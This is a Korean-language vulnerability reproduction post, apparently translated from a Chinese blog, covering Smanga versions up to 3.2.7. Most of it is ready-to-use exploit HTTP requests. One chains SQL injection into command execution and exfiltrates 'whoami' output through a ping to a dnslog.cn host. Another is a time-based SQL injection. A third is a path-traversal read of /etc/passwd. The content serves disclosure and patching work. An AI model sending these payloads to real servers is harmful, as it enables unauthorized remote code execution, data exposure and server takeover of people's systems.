[취약점 재발] Smanga 무단 원격코드 실행 취약점(CVE-2023-36076) 추가 SQL 주입 + 임의 파일 읽기


머리말

Smanga에는 공격자가 대상 호스트에서 임의 명령을 실행하고 서버 권한을 얻을 수 있는 무단 원격 코드 실행 취약점이 있습니다.


성명

본 글의 관련 기술을 이용하여 불법적인 테스트에 참여하지 마시기 바랍니다.본 글에서 제공하는 정보나 도구의 유포 및 사용으로 인해 발생하는 직간접적인 결과와 손실은 사용자 자신의 책임입니다.모든 불리한 결과와 기사 작성자는 관련이 없습니다. 이 기사는 교육 목적으로만 작성되었습니다.


1. 제품소개

구성이 필요하지 않으며 만화 스트리밍 미디어 읽기 도구가 docker에 직접 설치됩니다. Emby plex에서 영감을 받아 만화 읽기 요구 사항을 해결하기 위해 개발된 만화 리더입니다. Windows 환경에 smanga 설치 환경 패널을 배포하려면 먼저 작은 가죽 패널을 설치하고 smanga 프로젝트를 다운로드한 후 데이터베이스를 가져오고 smanga에 로그인한 후 Windows에 smanga를 배포합니다.

1. 취약점 설명

/php/manga/delete.php 인터페이스에 승인되지 않은 원격 코드 실행 취약점이 있으며, 공격자가 대상 호스트에서 임의의 명령을 실행하고 서버 권한을 얻을 수 있습니다.

2. 취약점 수준

  • 위험

3. 영향 범위

  • 스망가 ≤ V3.2.7

4. 취약점의 재발

환경 구축에 대해서는 링크를 참고하세요: https://www.bilibili.com/read/cv21910784/

시스템 인터페이스는 다음과 같습니다.
여기에 이미지 설명을 삽입하세요.
EXP:

POST /php/manga/delete.php HTTP/1.1
Host: XX.XX.XX.XX:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360

mangaId=1+union+select+*+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+join+%28select+4%29d+join+%28select+%27%5C%22%3Bping+-c+3+%60whoami%60.zm16pf.dnslog.cn%3B%5C%22%27%29e+join+%28select+6%29f+join+%28select+7%29g+join+%28select+8%29h+join+%28select+9%29i+join+%28select+10%29j+join+%28select+11%29k+join+%28select+12%29l%3B&deleteFile=true

여기에 이미지 설명을 삽입하세요.

5. 수리 제안

정식 패치가 공개되었습니다. 업그레이드해주세요.

6. 추가 취약점

취약점 1. SQL 인젝션

취약점 설명:
/php/history/add.php민감한 정보를 얻을 수 있는 SQL 주입 취약점이 있습니다.

영향을 받는 버전

  • 스망가 ≤ V3.2.7

악용하다

POC:

POST /php/history/add.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196

chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(5)%2C0)&timestamp=12123123&userId=1

여기에 이미지 설명을 삽입하세요.

취약점 2. 임의 파일 읽기

취약점 설명
/php/get-file-flow.php인터페이스의 파일 매개변수가 필터링되지 않고 경로 탐색이 있어 임의 파일 읽기 취약점이 발생하며, 승인되지 않은 공격자가 구성 파일을 읽을 수 있습니다.

영향을 받는 버전

  • 스망가 ≤ V3.2.7

POC 악용
:

POST /php/get-file-flow.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

file=../../../../../../../../etc/passwd

여기에 이미지 설명을 삽입하세요.

추천

출처blog.csdn.net/weixin_46944519/article/details/132984858